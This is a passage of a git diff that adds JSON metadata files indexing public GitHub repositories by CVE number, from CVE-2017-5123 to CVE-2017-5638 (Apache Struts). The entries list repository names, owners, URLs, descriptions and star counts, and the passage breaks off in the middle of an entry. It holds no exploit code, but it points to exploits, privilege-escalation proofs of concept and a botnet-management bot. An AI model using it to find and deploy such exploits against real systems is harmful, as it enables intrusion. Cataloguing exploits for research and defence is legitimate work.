"https:\/\/github.com\/c3r34lk1ll3r\/CVE-2017-5123", + "description": "PoC CVE-2017-5123 - LPE - Bypassing SMEP\/SMAP. No KASLR", + "fork": false, + "created_at": "2020-05-08T15:10:38Z", + "updated_at": "2024-11-03T16:45:29Z", + "pushed_at": "2020-06-26T13:39:16Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5123", + "exploit", + "kernel-exploit", + "writeup" + ], + "visibility": "public", + "forks": 4, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 612740053, + "name": "CVE-2017-5123", + "full_name": "h1bAna\/CVE-2017-5123", + "owner": { + "login": "h1bAna", + "id": 70074237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074237?v=4", + "html_url": "https:\/\/github.com\/h1bAna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1bAna\/CVE-2017-5123", + "description": null, + "fork": false, + "created_at": "2023-03-11T20:45:15Z", + "updated_at": "2024-02-25T18:57:44Z", + "pushed_at": "2023-03-11T20:52:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5124.json b/2017/CVE-2017-5124.json new file mode 100644 index 0000000000..6aa6be1c89 --- /dev/null +++ b/2017/CVE-2017-5124.json @@ -0,0 +1,33 @@ +[ + { + "id": 110604918, + "name": "CVE-2017-5124", + "full_name": "Bo0oM\/CVE-2017-5124", + "owner": { + "login": "Bo0oM", + "id": 3492361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3492361?v=4", + "html_url": "https:\/\/github.com\/Bo0oM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bo0oM\/CVE-2017-5124", + "description": "Chrome < 62 uxss exploit (CVE-2017-5124)", + "fork": false, + "created_at": "2017-11-13T21:33:55Z", + "updated_at": "2024-08-12T19:34:02Z", + "pushed_at": "2017-11-14T10:26:28Z", + "stargazers_count": 161, + "watchers_count": 161, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 161, + "score": 0, + "subscribers_count": 10 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5223.json b/2017/CVE-2017-5223.json new file mode 100644 index 0000000000..369120338e --- /dev/null +++ b/2017/CVE-2017-5223.json @@ -0,0 +1,33 @@ +[ + { + "id": 150419436, + "name": "CVE-2017-5223", + "full_name": "cscli\/CVE-2017-5223", + "owner": { + "login": "cscli", + "id": 18289534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18289534?v=4", + "html_url": "https:\/\/github.com\/cscli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cscli\/CVE-2017-5223", + "description": null, + "fork": false, + "created_at": "2018-09-26T11:58:32Z", + "updated_at": "2021-02-01T09:33:48Z", + "pushed_at": "2018-09-26T12:03:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5415.json b/2017/CVE-2017-5415.json new file mode 100644 index 0000000000..d6240770cc --- /dev/null +++ b/2017/CVE-2017-5415.json @@ -0,0 +1,33 @@ +[ + { + "id": 88234209, + "name": "CVE-2017-5415", + "full_name": "649\/CVE-2017-5415", + "owner": { + "login": "649", + "id": 23534047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23534047?v=4", + "html_url": "https:\/\/github.com\/649", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/649\/CVE-2017-5415", + "description": "Addressbar spoofing through blob URL (Firefox browser). An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by blob: as the protocol, leading to user confusion and further spoofing attacks.", + "fork": false, + "created_at": "2017-04-14T04:55:41Z", + "updated_at": "2024-08-12T19:29:05Z", + "pushed_at": "2017-04-14T04:55:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5487.json b/2017/CVE-2017-5487.json new file mode 100644 index 0000000000..7007dc957f --- /dev/null +++ b/2017/CVE-2017-5487.json @@ -0,0 +1,286 @@ +[ + { + "id": 107852472, + "name": "wpUsersScan", + "full_name": "teambugsbunny\/wpUsersScan", + "owner": { + "login": "teambugsbunny", + "id": 32997799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32997799?v=4", + "html_url": "https:\/\/github.com\/teambugsbunny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teambugsbunny\/wpUsersScan", + "description": "Wordpress Username Enumeration \/CVE-2017-5487,WordPress < 4.7.1 - ", + "fork": false, + "created_at": "2017-10-22T09:22:28Z", + "updated_at": "2024-08-12T19:33:31Z", + "pushed_at": "2017-06-11T16:47:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 121831599, + "name": "wpUsersScan", + "full_name": "R3K1NG\/wpUsersScan", + "owner": { + "login": "R3K1NG", + "id": 20783376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20783376?v=4", + "html_url": "https:\/\/github.com\/R3K1NG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R3K1NG\/wpUsersScan", + "description": " Wordpress Username Enumeration \/CVE-2017-5487,WordPress < 4.7.1 -", + "fork": false, + "created_at": "2018-02-17T05:59:49Z", + "updated_at": "2018-02-17T06:08:24Z", + "pushed_at": "2018-02-17T06:09:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 191190894, + "name": "CVE-2017-5487", + "full_name": "GeunSam2\/CVE-2017-5487", + "owner": { + "login": "GeunSam2", + "id": 41275199, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41275199?v=4", + "html_url": "https:\/\/github.com\/GeunSam2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeunSam2\/CVE-2017-5487", + "description": "POC of CVE-2017-5487 + tool", + "fork": false, + "created_at": "2019-06-10T15:07:17Z", + "updated_at": "2022-09-06T03:10:28Z", + "pushed_at": "2019-06-10T15:10:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 258976805, + "name": "wp-CVE-2017-5487-exploit", + "full_name": "patilkr\/wp-CVE-2017-5487-exploit", + "owner": { + "login": "patilkr", + "id": 2038254, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2038254?v=4", + "html_url": "https:\/\/github.com\/patilkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patilkr\/wp-CVE-2017-5487-exploit", + "description": "WordPress CVE-2017-5487 Exploit in Python", + "fork": false, + "created_at": "2020-04-26T08:17:41Z", + "updated_at": "2024-08-11T08:28:34Z", + "pushed_at": "2020-04-30T08:16:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424446993, + "name": "GrabberWP-CVE-2017-5487", + "full_name": "zkhalidul\/GrabberWP-CVE-2017-5487", + "owner": { + "login": "zkhalidul", + "id": 88600857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88600857?v=4", + "html_url": "https:\/\/github.com\/zkhalidul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zkhalidul\/GrabberWP-CVE-2017-5487", + "description": null, + "fork": false, + "created_at": "2021-11-04T02:25:57Z", + "updated_at": "2021-11-09T02:20:17Z", + "pushed_at": "2021-11-09T02:20:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594614443, + "name": "CVE-2017-5487", + "full_name": "SeasonLeague\/CVE-2017-5487", + "owner": { + "login": "SeasonLeague", + "id": 111581268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111581268?v=4", + "html_url": "https:\/\/github.com\/SeasonLeague", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeasonLeague\/CVE-2017-5487", + "description": "This is a vulnerability in the Linux kernel that was discovered and disclosed in 2017. ", + "fork": false, + "created_at": "2023-01-29T04:43:37Z", + "updated_at": "2023-01-29T04:45:54Z", + "pushed_at": "2023-01-29T04:47:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624771866, + "name": "CVE-2017-5487-vulnerability-on-NSBM", + "full_name": "Ravindu-Priyankara\/CVE-2017-5487-vulnerability-on-NSBM", + "owner": { + "login": "Ravindu-Priyankara", + "id": 78452012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78452012?v=4", + "html_url": "https:\/\/github.com\/Ravindu-Priyankara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ravindu-Priyankara\/CVE-2017-5487-vulnerability-on-NSBM", + "description": null, + "fork": false, + "created_at": "2023-04-07T08:10:45Z", + "updated_at": "2023-04-07T10:36:29Z", + "pushed_at": "2023-04-07T08:38:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637228442, + "name": "CVE-2017-5487-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2017-5487-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2017-5487-EXPLOIT", + "description": "A PoC exploit for CVE-2017-5487 - WordPress User Enumeration.", + "fork": false, + "created_at": "2023-05-06T22:46:08Z", + "updated_at": "2024-09-10T14:12:23Z", + "pushed_at": "2023-09-27T22:34:14Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-5487", + "exploit", + "rest-api", + "user-enumeration" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806764891, + "name": "CVE-2017-5487", + "full_name": "dream434\/CVE-2017-5487", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2017-5487", + "description": "wp-includes\/rest-api\/endpoints\/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json\/wp\/v2\/users request.", + "fork": false, + "created_at": "2024-05-27T21:19:33Z", + "updated_at": "2024-10-09T13:41:58Z", + "pushed_at": "2024-10-09T13:41:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5633.json b/2017/CVE-2017-5633.json new file mode 100644 index 0000000000..f5fc0abedf --- /dev/null +++ b/2017/CVE-2017-5633.json @@ -0,0 +1,33 @@ +[ + { + "id": 88568725, + "name": "Exploit-CVE-2017-5633", + "full_name": "cardangi\/Exploit-CVE-2017-5633", + "owner": { + "login": "cardangi", + "id": 22066466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22066466?v=4", + "html_url": "https:\/\/github.com\/cardangi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cardangi\/Exploit-CVE-2017-5633", + "description": "Exploit developed by me for CVE-2017-5633.", + "fork": false, + "created_at": "2017-04-18T01:44:33Z", + "updated_at": "2024-08-12T19:29:10Z", + "pushed_at": "2017-04-18T02:54:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-5638.json b/2017/CVE-2017-5638.json new file mode 100644 index 0000000000..ebd9d3552d --- /dev/null +++ b/2017/CVE-2017-5638.json @@ -0,0 +1,2226 @@ +[ + { + "id": 84158718, + "name": "S2-045", + "full_name": "PolarisLab\/S2-045", + "owner": { + "login": "PolarisLab", + "id": 25890110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25890110?v=4", + "html_url": "https:\/\/github.com\/PolarisLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PolarisLab\/S2-045", + "description": "Struts2 S2-045(CVE-2017-5638)Vulnerability environment - http:\/\/www.mottoin.com\/97954.html", + "fork": false, + "created_at": "2017-03-07T05:30:30Z", + "updated_at": "2022-03-22T17:04:53Z", + "pushed_at": "2017-03-07T05:37:55Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 84186490, + "name": "Struts2-045-Exp", + "full_name": "Flyteas\/Struts2-045-Exp", + "owner": { + "login": "Flyteas", + "id": 15673913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15673913?v=4", + "html_url": "https:\/\/github.com\/Flyteas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Flyteas\/Struts2-045-Exp", + "description": "Struts2 S2-045(CVE-2017-5638)Exp with GUI", + "fork": false, + "created_at": "2017-03-07T10:30:20Z", + "updated_at": "2023-09-08T07:15:23Z", + "pushed_at": "2017-03-13T06:30:41Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 61, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 84277596, + "name": "cve-2017-5638", + "full_name": "bongbongco\/cve-2017-5638", + "owner": { + "login": "bongbongco", + "id": 3170006, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bongbongco\/cve-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-03-08T04:17:33Z", + "updated_at": "2017-03-08T04:31:28Z", + "pushed_at": "2017-03-08T04:31:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 84481525, + "name": "S2-045-EXP-POC-TOOLS", + "full_name": "jas502n\/S2-045-EXP-POC-TOOLS", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/S2-045-EXP-POC-TOOLS", + "description": "S2-045 漏洞 POC-TOOLS CVE-2017-5638", + "fork": false, + "created_at": "2017-03-09T19:40:47Z", + "updated_at": "2024-08-12T19:28:17Z", + "pushed_at": "2021-08-18T08:18:42Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 24, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 84518902, + "name": "strutszeiro", + "full_name": "mthbernardes\/strutszeiro", + "owner": { + "login": "mthbernardes", + "id": 12648924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12648924?v=4", + "html_url": "https:\/\/github.com\/mthbernardes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mthbernardes\/strutszeiro", + "description": "Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)", + "fork": false, + "created_at": "2017-03-10T04:23:41Z", + "updated_at": "2024-08-12T19:28:17Z", + "pushed_at": "2021-08-16T13:58:19Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 41, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 84581800, + "name": "cve-2017-5638", + "full_name": "xsscx\/cve-2017-5638", + "owner": { + "login": "xsscx", + "id": 10790582, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10790582?v=4", + "html_url": "https:\/\/github.com\/xsscx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsscx\/cve-2017-5638", + "description": "Example PoC Code for CVE-2017-5638 | Apache Struts Exploit ", + "fork": false, + "created_at": "2017-03-10T16:56:14Z", + "updated_at": "2024-09-10T07:19:55Z", + "pushed_at": "2017-03-12T15:43:27Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "code", + "content-type", + "cve-2017-5638", + "exploit", + "poc", + "python", + "struts2" + ], + "visibility": "public", + "forks": 25, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 84602394, + "name": "apache-struts2-CVE-2017-5638", + "full_name": "immunio\/apache-struts2-CVE-2017-5638", + "owner": { + "login": "immunio", + "id": 6700387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6700387?v=4", + "html_url": "https:\/\/github.com\/immunio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/immunio\/apache-struts2-CVE-2017-5638", + "description": "Demo Application and Exploit", + "fork": false, + "created_at": "2017-03-10T21:33:25Z", + "updated_at": "2024-08-12T19:28:18Z", + "pushed_at": "2017-03-13T15:03:32Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-struts2-045", + "cve-2017-5638" + ], + "visibility": "public", + "forks": 39, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 84620334, + "name": "OgnlContentTypeRejectorValve", + "full_name": "Masahiro-Yamada\/OgnlContentTypeRejectorValve", + "owner": { + "login": "Masahiro-Yamada", + "id": 479387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/479387?v=4", + "html_url": "https:\/\/github.com\/Masahiro-Yamada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masahiro-Yamada\/OgnlContentTypeRejectorValve", + "description": "This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)", + "fork": false, + "created_at": "2017-03-11T03:18:12Z", + "updated_at": "2017-04-11T00:06:36Z", + "pushed_at": "2017-03-13T14:49:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 84639178, + "name": "CVE-2017-5638-Apache-Struts2", + "full_name": "aljazceru\/CVE-2017-5638-Apache-Struts2", + "owner": { + "login": "aljazceru", + "id": 4439523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4439523?v=4", + "html_url": "https:\/\/github.com\/aljazceru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aljazceru\/CVE-2017-5638-Apache-Struts2", + "description": "Tweaking original PoC (https:\/\/github.com\/rapid7\/metasploit-framework\/issues\/8064) to work on self-signed certificates ", + "fork": false, + "created_at": "2017-03-11T09:39:09Z", + "updated_at": "2019-07-15T22:02:37Z", + "pushed_at": "2017-03-11T09:41:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 84640546, + "name": "test_struts2_vulnerability_CVE-2017-5638", + "full_name": "sjitech\/test_struts2_vulnerability_CVE-2017-5638", + "owner": { + "login": "sjitech", + "id": 5180638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5180638?v=4", + "html_url": "https:\/\/github.com\/sjitech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sjitech\/test_struts2_vulnerability_CVE-2017-5638", + "description": "test struts2 vulnerability CVE-2017-5638 in Mac OS X", + "fork": false, + "created_at": "2017-03-11T10:03:54Z", + "updated_at": "2017-03-13T11:14:00Z", + "pushed_at": "2017-03-13T07:38:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 84642680, + "name": "CVE-2017-5638", + "full_name": "jrrombaldo\/CVE-2017-5638", + "owner": { + "login": "jrrombaldo", + "id": 121948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121948?v=4", + "html_url": "https:\/\/github.com\/jrrombaldo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrrombaldo\/CVE-2017-5638", + "description": null, + "fork": false, + "created_at": "2017-03-11T10:43:16Z", + "updated_at": "2024-03-29T16:06:15Z", + "pushed_at": "2024-03-29T16:06:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 84644857, + "name": "CVE-2017-5638", + "full_name": "random-robbie\/CVE-2017-5638", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/CVE-2017-5638", + "description": "CVE: 2017-5638 in different formats", + "fork": false, + "created_at": "2017-03-11T11:22:44Z", + "updated_at": "2017-03-11T11:28:58Z", + "pushed_at": "2017-03-16T11:26:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 84655941, + "name": "CVE-2017-5638_struts", + "full_name": "initconf\/CVE-2017-5638_struts", + "owner": { + "login": "initconf", + "id": 4044729, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4044729?v=4", + "html_url": "https:\/\/github.com\/initconf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/initconf\/CVE-2017-5638_struts", + "description": "detection for Apache Struts recon and compromise ", + "fork": false, + "created_at": "2017-03-11T14:30:02Z", + "updated_at": "2020-04-13T02:20:20Z", + "pushed_at": "2017-09-15T22:34:00Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 84693026, + "name": "struts-pwn", + "full_name": "mazen160\/struts-pwn", + "owner": { + "login": "mazen160", + "id": 8996052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8996052?v=4", + "html_url": "https:\/\/github.com\/mazen160", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mazen160\/struts-pwn", + "description": "An exploit for Apache Struts CVE-2017-5638", + "fork": false, + "created_at": "2017-03-12T02:02:25Z", + "updated_at": "2024-11-20T11:10:17Z", + "pushed_at": "2018-05-21T18:33:26Z", + "stargazers_count": 426, + "watchers_count": 426, + "has_discussions": false, + "forks_count": 135, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve-2017-5638", + "exploit", + "struts", + "struts-pwn" + ], + "visibility": "public", + "forks": 135, + "watchers": 426, + "score": 0, + "subscribers_count": 22 + }, + { + "id": 84705148, + "name": "Struts-Apache-ExploitPack", + "full_name": "ret2jazzy\/Struts-Apache-ExploitPack", + "owner": { + "login": "ret2jazzy", + "id": 20831187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20831187?v=4", + "html_url": "https:\/\/github.com\/ret2jazzy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ret2jazzy\/Struts-Apache-ExploitPack", + "description": "These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)", + "fork": false, + "created_at": "2017-03-12T06:28:51Z", + "updated_at": "2024-08-12T19:28:20Z", + "pushed_at": "2017-03-12T07:26:03Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 84725982, + "name": "ExpStruts", + "full_name": "lolwaleet\/ExpStruts", + "owner": { + "login": "lolwaleet", + "id": 20018319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20018319?v=4", + "html_url": "https:\/\/github.com\/lolwaleet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lolwaleet\/ExpStruts", + "description": "A php based exploiter for CVE-2017-5638.", + "fork": false, + "created_at": "2017-03-12T13:03:52Z", + "updated_at": "2020-03-15T16:58:21Z", + "pushed_at": "2017-03-12T13:04:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "php", + "struts2" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 84819853, + "name": "CVE-2017-5638-Apache-Struts2", + "full_name": "oktavianto\/CVE-2017-5638-Apache-Struts2", + "owner": { + "login": "oktavianto", + "id": 8210275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8210275?v=4", + "html_url": "https:\/\/github.com\/oktavianto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oktavianto\/CVE-2017-5638-Apache-Struts2", + "description": "Example PHP Exploiter for CVE-2017-5638", + "fork": false, + "created_at": "2017-03-13T11:39:55Z", + "updated_at": "2024-08-12T19:28:22Z", + "pushed_at": "2017-03-20T19:40:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 85010282, + "name": "cve-2017-5638", + "full_name": "jrrdev\/cve-2017-5638", + "owner": { + "login": "jrrdev", + "id": 17674081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17674081?v=4", + "html_url": "https:\/\/github.com\/jrrdev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrrdev\/cve-2017-5638", + "description": "cve-2017-5638 Vulnerable site sample", + "fork": false, + "created_at": "2017-03-15T00:19:33Z", + 